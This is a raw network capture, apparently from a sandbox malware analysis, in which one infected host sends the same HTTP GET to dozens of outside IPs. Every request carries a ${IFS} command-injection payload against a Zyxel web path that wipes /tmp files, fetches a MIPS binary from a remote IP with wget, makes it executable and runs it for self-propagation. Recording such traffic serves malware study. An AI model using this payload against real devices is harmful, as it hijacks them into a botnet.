                                                        Jan 28, 2024 10:11:58.868664026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192.168.2.1443214156.58.208.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868793964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192.168.2.1456962111.48.74.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868855953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192.168.2.1435012125.148.1.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868901014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192.168.2.144554262.27.17.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868947029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192.168.2.143702678.10.210.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.868990898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19192.168.2.1433680178.178.33.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869139910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192.168.2.1454882190.58.237.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869201899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192.168.2.143560435.234.236.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869261026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192.168.2.1438528114.94.190.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869328022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23192.168.2.1448376201.17.38.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869426966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24192.168.2.144168880.201.229.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869483948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25192.168.2.1457808205.247.106.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869648933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26192.168.2.145653669.111.33.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869695902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        27192.168.2.144376440.211.81.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869775057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        28192.168.2.143691484.199.89.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869828939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        29192.168.2.1446534109.216.122.132443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869947910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30192.168.2.1448606115.185.199.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.869968891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        31192.168.2.1440446130.11.101.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870114088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32192.168.2.1452664147.156.52.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870218992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33192.168.2.1447666182.227.163.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870274067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34192.168.2.145294642.81.148.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870275974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35192.168.2.1459460218.17.35.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870393038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192.168.2.1446178217.4.33.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870445013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37192.168.2.1433984199.162.58.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870522976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        38192.168.2.1434280193.61.80.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870595932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        39192.168.2.145722887.146.210.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870657921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        40192.168.2.1449412207.27.41.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870783091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        41192.168.2.1454684171.15.170.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870839119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        42192.168.2.144270463.172.27.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870839119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        43192.168.2.1434278149.227.147.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870918989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        44192.168.2.1450194189.229.159.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.870987892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        45192.168.2.1452390187.205.90.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871028900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        46192.168.2.1447508181.243.62.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871079922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        47192.168.2.1460088218.189.143.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871191978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        48192.168.2.1452014105.107.55.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871217966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        49192.168.2.1452506153.101.67.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871262074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        50192.168.2.1460972114.23.79.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871289015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        51192.168.2.1434628200.168.73.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871402025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        52192.168.2.1445190193.108.79.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871459007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        53192.168.2.144585252.62.154.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871490002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        54192.168.2.1455214161.40.84.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871560097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        55192.168.2.1451746137.89.174.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871584892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        56192.168.2.1435650122.85.17.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871686935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        57192.168.2.145521892.67.17.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871689081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        58192.168.2.145540023.43.175.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871753931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        59192.168.2.1447212183.121.144.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871772051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        60192.168.2.146008612.160.220.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871872902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        61192.168.2.145630686.45.189.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871876955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        62192.168.2.1443410158.228.82.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.871915102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        63192.168.2.1451384179.203.30.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872021914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        64192.168.2.145608042.2.84.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872046947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        65192.168.2.1455724201.75.196.93443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872050047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        66192.168.2.1456042136.131.172.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872164965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        67192.168.2.1435552161.241.115.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872230053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        68192.168.2.144791277.104.165.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872236967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        69192.168.2.1435438172.81.134.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872343063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        70192.168.2.145047046.36.122.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872366905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        71192.168.2.1440432213.114.173.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872380972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        72192.168.2.145904093.74.211.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872474909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        73192.168.2.1443324221.150.237.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872481108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        74192.168.2.1435360155.253.178.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872634888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


